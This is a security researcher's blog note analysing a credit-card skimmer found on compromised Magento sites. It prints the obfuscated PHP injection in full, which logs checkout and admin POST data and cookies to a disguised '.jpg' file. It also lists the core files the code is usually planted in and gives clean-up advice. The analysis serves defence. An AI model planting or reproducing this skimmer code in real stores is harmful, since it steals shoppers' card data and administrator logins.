Another sample of a Magento compromise for profit

  • June 6, 2016
Labs Note

We are often seeing malicious code being used to steal credit card details and sensitive information from compromised Magento sites, but this one caught our eyes as it was a bit different from the others on how the information was collected and stored.

Usually, the attacker send all the sensitive information via e-mail but in this case a text file with a “jpg” extension is created to store all the data:

if(preg_match("/".base64_decode('YWRtaW58cGF5bWVudHxvcmRlcnxzYXZlT3JkZXJ8b25lcGFnZXxjaGVja291dA==')."/i", $_SERVER["REQUEST_URI"])){ 
if(!empty($_POST))@file_put_contents(base64_decode('L2Nocm9vdC9ob21lL2RhaWx5Z3JhL2RhaWx5Z3JhYnMuY29tL2h0bWwvbWVkaWEvY2F0YWxvZy9wcm9kdWN0LzIvMS8yMV8xLmpwZw=='), base64_encode( @serialize($_POST)."--".@seralize($_COOKIE) )."\n", FILE_APPEND);
}

Basically, this code writes all the requests that contain one these words in the URL:”admin|payment|order|saveOrder|onepage|checkout” to a file located in “/media/catalog/product/2/1/21_1.jpg”.

As you can imagine at this point, the customer’s credit card details and admin’s login are now available for download.

The data is encoded and serialized inside the file “21_1.jpg” but after revert these steps you’ll see something like this:

[payment] => Array

        (
            [method] => vm
            [cc_type] => VI
            [cc_number] => XXXXX -> indistinct cc number
            [c_exp_month] => 9
            [cc_exp_year] => 2017
            [cc_cid] => 048
        )

Among other data, you’ll see admin passwords, customer data and credit card details. It’s quite scary realize that all these information is being stolen and attackers are continually changing their methods to keep undetected.

This particularly code is usually added inside the files “./app/code/core/Mage/Core/functions.php” or “./lib/Varien/Autoload.php” but other files may be affected. We recommend check constantly the core files for any change and keep all the software updated. Also, for obvious reasons, it’s incredibly important change the password for all the admin users to avoid re-infections.

Finally, If you need a professional help, you can always count on us.

John Castro is Sucuri's Vulnerability Researcher who joined the company in 2015. His main responsibilities include threat intelligence and vulnerability analysis. John's professional experience covers more than a decade of pentesting, vulnerability research and malware analysis. When John isn't working with WordPres plugin vulnerabilities, you might find him hiking or hunting for new restaurants. Connect with him on LinkedIn

Related Tags
Related Categories
You May Also Like